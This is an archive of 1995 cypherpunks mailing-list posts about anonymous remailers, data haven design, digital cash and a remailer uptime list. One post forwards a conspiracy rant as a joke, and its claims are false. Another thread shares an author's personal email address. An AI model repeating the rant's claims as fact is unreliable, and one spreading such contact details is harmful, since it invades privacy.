From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 9 Jan 95 03:51:37 PST
To: Lou Poppler <lwp@garnet.msen.com>
Subject: Re: Vinge's True Email name ?
In-Reply-To: <Pine.BSI.3.91.950109001111.9299A-100000@garnet.msen.com>
Message-ID: <9501091150.AA22634@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Lou Poppler says:
> I knew that old compuserve account was good for something.
> They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com

Too bad for him that he used his true name. Now lots of "fans" are
going to bother him....

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 9 Jan 95 06:48:43 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501091450.GAA27265@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.bsu.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.

Last ping: Mon 9 Jan 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nately   remailer@nately.ucsd.edu         ++++++++++    1:28:30  99.99%
rahul    homer@rahul.net                  **#**##****#     4:31  99.99%
mix      mixmaster@nately.ucsd.edu        ++-+-++-++      48:36  99.99%
penet    anon@anon.penet.fi               *+****+*****    28:32  99.99%
vox      remail@vox.xs4all.nl             -----------  14:34:13  99.99%
usura    usura@replay.com                  -- -+--+***    22:31  99.44%
bsu-cs   nowhere@bsu-cs.bsu.edu           +##**##***+#    23:14  99.26%
ideath   remailer@ideath.goldenbear.com   *  --- -----  2:08:58  99.12%
q        q@c2.org                          --+--*++--   2:33:18  98.62%
soda     remailer@csua.berkeley.edu       -..-.- ...    8:10:14  98.47%
alumni   hal@alumni.caltech.edu           ++ *-**+****     7:37  97.74%
portal   hfinney@shell.portal.com         ** *-#*#*#**     5:32  97.74%
c2       remail@c2.org                    *--*+*    *+  1:13:45  95.50%
desert   remail@desert.xs4all.nl          _.----.---   19:54:01  94.80%
extropia remail@extropia.wimsey.com       ++__   +++++ 13:02:14  84.83%
xs4all   remailer@xs4all.nl               *--    -+***    16:29  76.54%
rebma    remailer@rebma.mn.org            -*___-__-    31:31:05  70.47%
flame    tomaz@flame.sinet.org            -*-*+           29:22  37.83%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in relpy blocks using Encrypt-Key:
          header.


   Comments and suggestions welcome!

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raul Deluth Miller <rockwell@nova.umd.edu>
Date: Mon, 9 Jan 95 05:11:16 PST
To: cypherpunks@toad.com
Subject: remailers
Message-ID: <199501091310.IAA13683@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm wondering if I understand this remailer debate.  Here's my summary
(based not so much on reading of cypherpunk traffic, but on my
understanding of the basic principles):

(*) define an encrypting mailer protocol (basically, just PGP or some
such).  When a mailer receives an encrypted message, it unpacks

(0) a message which may have been doubly encoded (once by originator,
once by prior remailer to disguise padding) -- if so, must decrypt
twice.
(1) the message to be forwarded, annotated with control info (e.g.
padding, delay, key to reencrypt under)
(2) payment information in whatever format is advertised for that
remailer.

As I understand it the problem with digital cash is defining physical
link for the "cash", without compromising the identity of whoever
payed into the account.

The proposal-to-date involves a guild of remailers.  As I see it, this
would be primarily of value for shuffling cash around -- call it a
build of bankers instead.  Once you've established your "cash"-net,
presumably with related services such as drop-boxes and temporary
accounts, you could use more flexible mechanisms for anonymous mail,
which feed off the cash net where necessary.

I've not read Chaum(sp?)'s work on encrypted cash, so perhaps I've
ignored some terribly obvious issues.

[No PGP signature -- at the moment, I don't have a host sufficiently
secure to be worth bothering with.]

-- 
Raul D. Miller          N=:((*/pq)&|)@                 NB. public e, y, n=:*/pq
<rockwell@nova.umd.edu> P=:*N/@:#               NB. */-.,e e.&factors t=:*/<:pq
                        1=t|e*d    NB. (,-:<:)pq is four large primes, e medium
x-:d P,:y=:e P,:x                  NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 9 Jan 95 09:09:35 PST
To: cypherpunks@toad.com
Subject: Re: More signal than YOU can handle.
In-Reply-To: <199501090837.DAA29692@bb.hks.net>
Message-ID: <199501091709.JAA25055@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "L. Todd Masco" <cactus@hks.net>

   For the moment, all of the archives that Eric just dropped me are on
   ftp://ftp.hks.net/cypherpunks/All

This includes all the stored messages at toad.com from the beginning
of time up to a few months ago.  I've got a short lacuna at toad.com
from some deletion I never understood, but it's only a few weeks long
and is covered by Todd's archive.

I would like someone to make an official enumeration of the articles
as they passed out to the list for global reference.  You may
self-volunteer by grabbing the archives above and starting.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 9 Jan 95 09:24:53 PST
To: cypherpunks@toad.com
Subject: Re: Data Haven problems
In-Reply-To: <199501071710.LAA21334@pentagon.io.com>
Message-ID: <199501091724.JAA25074@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: dfloyd@io.com

   While programming my data haven code, I am wondering how to guard against
   spamming the data haven parser.

Here's an example of where the mechanism/policy distinction helps a
lot.  Mechanism here is how you store data.  Policy is how you decide
whether to accept a particular request.

The suggestions to date have all suggested particular policies to put
into your code (with the exception of Bill Stewart).  In addition,
almost all of these suggestions have been pay-per-use.  As significant
as policies are, they aren't your most important issue right now.

The single thing you need to get right today is the means of
separating the mechanism from the policy.  Different operators will
have different policies.  If it's difficult to change policies, fewer
services will be offered.

The issue of policy separation is a software architecture one.  I
don't know the structure of your code, but I'd suggest that whatever
it looks like, that you make a (1) clean interface and that you (2)
document it.  If you do these two things, you'll have substantially
achieved separation.

I think you should spend more time worrying about the interface than
about the specific policies.  In order to focus on the policy
interface, I'd suggest an extremely simple policy to work with,
namely, an access list.  Anyone listed can use the server; everyone
else is denied.  That will get you started.

I would distribute your first code with a simple policy such as this.
It will allow prototypes to get worked on.  Since a data haven isn't
of much use without clients for it, a simple policy is adequate for a
first release.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RGRIFFITH@sfasu.edu
Date: Mon, 9 Jan 95 07:32:20 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <01HLMZ1MIHOM000TCU@TITAN.SFASU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>At 09:45 AM 1/3/95 -0800, Hal wrote:
>> ... As I wrote, banks are
>>required to get SS#'s for depositers right now, and I wouldn't expect
>>that to change any time soon.  If anything, the trend appears to be
>>towards more tightening rather than less.  ...
>
>Isn't that only a requirement on interst-bearing, or potentially 
>interest-bearing, accounts?  
>
>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com
>
Yes, but  the account form will have a place for it anyway and the account
opening person will demand it.  My experience a few years ago was that
I had to go to an officer and point out that the account was not interest 
bearing and so the SS# was not required in order to get the account
opened without it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 07:37:40 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Data Haven problems
In-Reply-To: <Pine.HPP.3.91.950109114625.16546A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9501090902.A6205-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, Mats Bergstrom wrote:

> Hardly. (*.gi0 and *.jp0 for a start?)
> But what are data havens for, if not for controversial data?
> One of the greatest needs, if not _the_ greatest, in our times
> for a data haven is probably for storing porno. There is a
> tremendous, world-wide demand for porno. Yet, there are numerous
> countries where sex.gif's found on your disk (encrypted or not,
> they can use thumb-screws to force the key out of your hands)
> will put you in a very difficult situation (loss of social
> status, jail, decapitation). It might be much more convenient
> for, let's say, a Saudi teenager to store his encrypted private
> gif's in a data haven in Sweden, download them when he feels
> the urge and purge the copies after every use.

My feelings exactly.

Are we going to fall prey to the medias asault on porno and resort to 
self-censorship?  If a data haven resorted to filtering out all gifs and 
jpegs, or even porno, then it wouldn't be one I wouldn't use it, for my 
porn, nor for my other data.  If it is going to be a datahaven it can;t 
fall to such things as filtering data for controversial subject the owner 
doesn't like.


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Mon, 9 Jan 95 07:45:17 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <199501071710.LAA21334@pentagon.io.com>
Message-ID: <199501091546.AA19741@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Any ideas on how to guard against mailbombs, and to confirm to the sender
> that their files are stored successfully?  Perhaps do a mailing with
> a test command that validates the existance of the file, and sends a
> reply back wether the file is okay or not, or would this result in a
> possible security hole?

To solve problem #1, use digital postage of some form. Digicash, FV,
Tacky Tokens, Mountain Dew futures... just require a per-storage-unit
charge _to initially check in the file_. You can of course charge for
storage over time, too.

To solve problem #2, send an MD5 hash of the file back to the sender.
Ideally, you would also provide (in perl, C source, csh, or whatever)
a submission script which outputs an MD5 hash before the file is sent.
As long as the before-sending hash matches the hash returned by the
haven, you can assume that the file is intact.

> Lastly, instead of postage (like a remailer would get), how hard would it
> be to implement "rent" where if the "rent" is not paid, and a grace period
> has elapsed the file would be trashed.  All this while preserving the
> anonymity of the sender and the data haven site.

Not very. Use a dbm database to map "rent due" dates by file, then
periodically sweep through the database.

> As to the code, this will have to be my second rewrite as I am going to
> do it in perl code, rather than C...  last rewrite was from a daemon to
> a program activated by a .forward file.

Perl has the nice property of being fairly portable, too.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
		  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxFaRafb4pLe9tolAQH3EwQAmokOebOJtSbny7rAphWBE7n38XvWYbwy
SMFXmctU6DNnM+9oGTtlaROTUy2jbbt6zDf1/1wIOG/p0C6K7BAD8lt0mkrf4OqN
As1yf9JLxtTHgYIKF94aUiGiqCUo5zWe12CB+GwZ9LKma4BxXKqT3iCYrjQL+2Su
us2wL5AVRd4=
=McPN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Mon, 9 Jan 95 09:54:33 PST
To: cypherpunks@toad.com
Subject: Rumored CBS "hit" on internet coming
Message-ID: <199501091755.JAA10056@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


This may be old news or it could be bogus but fyi anyway:


>From parsons@bga.com Mon Jan  9 05:16:49 1995
>From: Brad Parsons <parsons@bga.com>
>Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd)
>To: bdolan@well.sf.ca.us
>
>
>Brad, Could you forward this to the cypherpunks list?  Thanks.--BJP
>
>---------- Forwarded message ----------
>Date: Mon, 9 Jan 1995 03:48:01 -0600 (CST)
>Subject: CBS/C.Chung Plan Hit Job on Internet?
>
>A friend tells me that CBS and Connie Chung plan a hit job on Internet
>on the evening news today, 1/9/95.  Apparently it may be in the context 
>of youths supposedly learning how to make bombs from online info.  In 
>case I don't get to watch it, could somebody make it a point to watch 
>it and give us a summary of the report.  Thanks.


Reply, if you're inclined, via e-mail.  I'm off the list until the Carol 
Ann stuff dies out.    - Brad Dolan,  bdolan@well.sf.ca.us








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 9 Jan 95 07:09:57 PST
To: perry@imsi.com
Subject: Re: Vinge's True Email name ?
Message-ID: <199501091510.AA16373@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


>Lou Poppler says:
>> I knew that old compuserve account was good for something.
>> They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com
>

Of course, he might have used his true name because he wanted to
hear from people. Tom Clancy seems to enjoy the newsgroup created
to discuss his books and he posts there regularily. Many people
strive to become famous because they love the adolation of the fans. 
Others don't. Who knows about VV? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Garcia <agarcia@Starbase.NeoSoft.COM>
Date: Mon, 9 Jan 95 08:27:41 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501091510.AA16373@access3.digex.net>
Message-ID: <199501091628.KAA00456@Starbase.NeoSoft.COM>
MIME-Version: 1.0
Content-Type: text/plain


As Wei Dai pointed out, the hostname of Vernor Vinge's office
workstation at San Diego State University can be easily determined in
about 5 minutes of poking about.  (He appears to have about 10-15
shells running at any given time...)

I really enjoy his work.  However, I've never sent him any email.
The general impression I've gotten is that he prefers not to receive
fan email, since it distracts him from important work.

If you *really* want to send him fan mail, I recommend sending it in
paper form to his publisher.  First, this allows him to better handle
fan mail in batches.  Second, this gives his publisher some indication
of interest in his work, and maybe gets him a better deal on his next
book.

-Anthony Garcia
agarcia@neosoft.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 9 Jan 95 08:28:01 PST
To: carolann@mm.com
Subject: Re: Remailer Abuse
Message-ID: <9501091624.AA05922@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


What lists did you post to?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Mon, 9 Jan 95 11:48:43 PST
To: cypherpunks@toad.com
Subject: HUMOR:...and we thought _PRZ_ had troubles!
Message-ID: <ab368f82000210037e1d@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


My apologies for this non-crypto posting, but I just _couldn't_ resist
sharing. Ironically (incredulously?), paranoia does nothing to improve
one's grasp of adjectives and adverbs... Anyway, please, please restrict
your replies (if any) to private email amongst yourselves and don't follow
my poor example and post anything more about it to the list.

BTW..."Half" street?!

    dave
____________________________________
 "Fascinating, Captain." -Mr. Spock

 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Newsgroups: alt.alien.visitors
Subject: Truth or Paranoia?
From: doctor.doom@citylink.uu.holonet.net
Date: Fri, 6 Jan 95 21:56:00 EST
I found the following disturbing post on a BBS in the Washington DC area:

Msg #  48 of  83                 Date: Fri 12-03-93,  6:29 pm
From: UNIT                       Read: 7 times  [1 Reply]

Forwarded From: 1900 Half Street, SW
Subject: important

The story I am about to relate may seem incredulous in many ways even
thought it is true and I solemly attest that it is true despite the fact
that it seems incredulous in many ways there is verifiable evidence and i
urge you to verify the evidence on your own if you should find this
incredulous which is the natural response.   I am a victim of government
sponsored terrorism and racism sponsored by the us government and big
corporations which actually work HAND IN HAND with the us government towards
these ends.  This of course includes the liberal media although some cells
of independence remain and not all individual journalists are accessories to
the conspiracy.  Suffice it to say that democracy does not in any way exist
in the United States of AmeriKKKa.   The government has been out to get me
ever since I was born in 1966 as a result of a specific genetic coding
abnormality which makes me unique among the 99.9999 th percentile of the
American population and makes people like me marked for harrassment.  The
abnormality may have been spawned by mass CIA mind control tests conducted
in 1961, which affected certain birth patterns. They actually have
attempted to cause me to try to kill myself on several occasions and have
attempted to drive me crazy by chemical and psychological means including
retroactive radio control from the future (any scientist will tell you that
radio waves which move faster than light speed are capable of moving
backwards in time and thus controlling the past). The constant chemical
assaults on my well being mean I cannot leave my apartment except in dire
circumstances and then I must breathe through a gas mask.  Not only that
but people are strategically placed at all places I interact with people
out of necessity (I cannot avoid such encounters entirely) to make me self
aware and paranoid.  These efforts are futile and I continue to defy the
Amerikkkan government.   On June 11 1986 they deliberately influenced me by
radio to be present at the intersection of Sherman Avenue and Harvard
Street NW at precisely 1:42 am and I had to cross seven blocks of territory
that had been sealed by the police.   This is documented.  I witnessed
seven police forces engaged in a shootout that lasted three hours.   THe
police forces were shooting at EACH OTHER and I counted at least thirty
verifiable casualties.  Although this has never made the newspapers due to
the government/corporate conspiracy the information is readily obtainable
but must be sought through FOIA requests at the FBI.   The files are
disguised as traffic fatalities and the true cause of death is not noted.
Also documentable is my genetic trait which Johns Hopkins in Baltimore will
provide upon demand.   I am considered a threat to the CIA because of my
superior evolutionary status and my radical thoughts.   In 1971 the United
States abandoned the Bretton Woods system of fixed exchange rates and
secretly implemented a dual currency system along with ruling elites from
other major countries including the USSR and Red China. I know this because
agents have tried to buy me off with this currency which exists solely in
the form of informational transactions and has no physical manifestations
yet makes a mockery of the valueless Dollar.   I am a man of integrity and
I refused to participate in this plot.   Needless to say the federal
deficit is measured in dollars and is therefore nonexistent and irrelevant.
 The secret currency system is solvent. In 1987 the Wall Street Journal
documented the cataclysmic stock market crash but made no mention of the
real underlying factors behind it, which again represented a government
conspiracy.  After I wrote to the Wall Street Journal to point this out,
attempts to kill me trebled.   There are also listening devices implanted
everywhere to monitor my actions and junk mail sorted with DMSO and curare
arrives daily.  I remove the mail with tweezers and leave it on the counter
for the mailman as unreturnable.  He wears gloves of course. The only
reason I am still alive is because I persist in making my case public at
every opportunity, which means the government does not directly try to kill
me but relies on third-party means which I have so far avoided. A rental
car I obtained in Sausalito in 1989 was irradiated with depleted uranium
which increased the total mass of the car by 33% d would have caused me to
go over a cliff were it not for the normal precaution I take of always
driving 15 mph under the speed limit. But it is this kind of insidiousness
which I am consdtantly faced with.   I also can only cross the street in
crosswalks so that any attempt to kill me with a vehicle could not be
blamed on pedestrian error.  The only reason I am still alive is because I
persist in making my case public at every opportunity, which means the
government will not try to kill me directly, since that would verify my
claims instantly in the public's eyes.   For that reason I urge all of you
to write to the media, contact your senators, and do everything you can to
let the conspirators know  that my story has been heard, and that the eyes
of the public are upon the conspiracy.  It is only through concerted
collective action that I can remain alive and the AmeriKKKan government
which has been ruling illegitimately since a secret coup in 1947 (documented
at the Library of Congress) can be brought down and freedom restored.

-end?-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@c2.org>
Date: Mon, 9 Jan 95 11:32:46 PST
To: alt.privacy.anon-server@demon.co.uk
Subject: Re: Remailer source
In-Reply-To: <199412301935.AA22766@von-neumann.info.polymtl.ca>
Message-ID: <199501091929.LAA22433@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Octavian  Ureche <tavi@info.polymtl.ca> wrote:

> Does anybody know where could I find UNIX sources
> for a remailer ?

ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 11:47:52 PST
To: cypherpunks@toad.com
Subject: Experiments and Toys vs. the Real Thing
Message-ID: <199501091946.LAA06410@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



The debate about data havens and what they ought to really be, what
they ought to really accept, etc., is similar to debates about what
digital money ought to be, how remailers ought to operate, etc.

It's useful to categorize projects as "experimental" (or "toy," with
no negative connotations implied) or "commercial" (or "real," I
suppose):

* EXPERIMENTAL, or TOY: Early efforts, meant to help illuminate the
issues, uncover problems, gain knowledge, educate people, etc.

* COMMERCIAL, or REAL: More robust, well-established. Usually "for
pay," and expected to be maintained, available, professionally
operated.

Now there's a fuzzy distinction between these, a continuum, really.
For example, PGP began life (esp. as v. 1.0) as an amateur or
experimental thing, with a few hacker experimentalists playing with
it. Version 2.x has been usable as a commercial tools, every bit as
good as "MailSafe," the ostensibly commerical RSADSI tool. The user
community has added enough capability and hooks to clearly put PGP in
the COMMERCIAL category: robust, supported, etc.

Remailers are _almost_ in the second category, especially when taken
as an ecological whole. (That is, any single remailer may be
flaky--though many aren't--but the pinging and reputation tools that
support the ecology make the ensemble more robust and usable.) Many of
us believe that "digital postage" paid remailing will be the final
step needed to move remailers into the commercial/real category.
Until thien, they're not businesses--they're hobbies and experiments.

(Which is fine, as one of the main reasons for Cypherpunks was to take
the academic papers presented at Crypto conferences and reify them in
working code, as experiments.)

Digital cash is more clearly still at the experimental level, as are
anonymous markets (like BlackNet), data havens, and so forth.

Why do I mention these points? Because there's a danger in "premature
professionalization." And a danger in criticizing experimental or toy
efforts for not being "pure enough."

The recent claims that nascent "data havens" _must_ support all files,
including hard-core porn, weapons secrets, etc. seems to be an example
of this. I'm not for censorship, just concerned that the data haven
_experiments_ are not secure enough, not robust enough, to actually
carry high-visibility files.

For example, data havens will clearly someday be used to carry defense
secrets, troop movements, weapons manufacturing details, etc. But I
would not want to carry them on my "experimental data haven," for
obvious reasons. Even if I only carried "non-American" secrets, such
as reports on Russian troop manouvers around Grozny, I could expect
visits from American officials (to stop me, to plant data they want
planted, etc.). 

(And let's not forget "snatch teams" that grab foreign nationals
suspected of crimes...Israel, Iraw, Iran, and the U.S. have grabbed
people in other countries. And more common is simple execution. If a
Swedish data haven carried files related to U.S. operations, and the
data haven location was known--part of what I mean by saying the
enabling technologies do not yet exist--then various measures would be
applied. Diplomatic, equipment sabotoage, even killing the operators.
I'm not being Ludlumesque here...clearly such "threats to national
security" would be seen as justifying various reactions. Especially to
send a message to other potential operators.)

Those advocating a "purist" (= professional/real) approach to data
havens, seen recently in the calls for data havens to never screen
files or accesses, should bear in mind that "data haven technology" is
lacking. Remailer chains leading in and out of data havens are still
non-robust, subject to attacks and compromises. And of course, digital
cash is still being thrashed out.

An experimental data haven that allowed unscreened access or
depositing of information would also become a a magnet for kooks, for
those wishing to sabotage such havens, etc. If truly serious
information was found on the haven, huge efforts would be mounted to
find the source, get the site shut down, etc. Current remailer
technology is just not up to the challenge. (I'm not saying it won't
someday be, just not now.)

Criticizing experimental data havens for "not going all the way" seems
to me to be wrong-headed. First, there's the usual issue of who bears
the risk, with those not at risk urging others to put themselves and
their sites are risk by being "pure." Second, and more important, the
enabling technologies for data havens are just not yet themselves
available and robust.

A data haven that carries "Four Horseman of the Infocalypse" material
will come under strong attack, legal, cryptographic, and physical.

There's a place for experimental or toy implementations, e.g., data
havens that operate in some limited domain. This allows the issues to
get explored before full-scale attacks are mounted. Think of it as a
training exercise, a drill, or an immunization.

--Tim May, who thinks the first real data havens will come under
intense attack and so had better be secure from the start

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 11:56:00 PST
To: bdolan@well.sf.ca.us (Brad Dolan)
Subject: Re: Rumored CBS "hit" on internet coming
In-Reply-To: <199501091755.JAA10056@well.sf.ca.us>
Message-ID: <199501091955.LAA07671@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> >Subject: CBS/C.Chung Plan Hit Job on Internet?
> >
> >A friend tells me that CBS and Connie Chung plan a hit job on Internet
> >on the evening news today, 1/9/95.  Apparently it may be in the context 
> >of youths supposedly learning how to make bombs from online info.  In 
> >case I don't get to watch it, could somebody make it a point to watch 
> >it and give us a summary of the report.  Thanks.

Argghh!! When Connie interviewed me last week, she said I could
_whisper_ some dark uses to her and it would just be between the two
of us!

Life's a bitch, and so is Connie.

> Reply, if you're inclined, via e-mail.  I'm off the list until the Carol 
> Ann stuff dies out.    - Brad Dolan,  bdolan@well.sf.ca.us

It seems to have gone through the "Newbie-nova" (a double newism?)
phase and is already dropping exponentially.

(By Newbie-nova I mean the spate of initial posts. I know the
syndrome, as I made several posts on my first day on "Cyberia.")

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 9 Jan 95 09:01:00 PST
To: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
Subject: Re: BofA+Netscape
In-Reply-To: <y960wc1w165w@voxbox.norden1.com>
Message-ID: <9501091655.AA24435@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
    Date: Tue, 13 Dec 94 11:27:45 EST
    
    Rick Busdiecker <rfb@lehman.com> writes:
    
    >     Even Apple & Microsoft agree that Netscape is brain dead...
    
Please be more careful in your attributions.

The extent to which I wrote the above comment is that I quoted it from
someone else's article.

			Rick

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxFqg5NR+/jb2ZlNAQFRbwP/cPEMxF4aSfGPyi7gbudxG6NGUtNl9Ted
hsCDzg4KLb1jRTtwt66c6R+W8Qd1ekZw6kv9qbCu/xiIDNI4DG0Z9VUyt4a4+EdE
v45i5An70yLUS6wd7ncicH4Rxoo4KxU2fOwe5PZWzBAWHWRQA8zOB8pbpbwZcg6Q
BCkf6Q6jGTc=
=ngk4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Mon, 9 Jan 95 03:07:59 PST
To: cypherpunks@toad.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
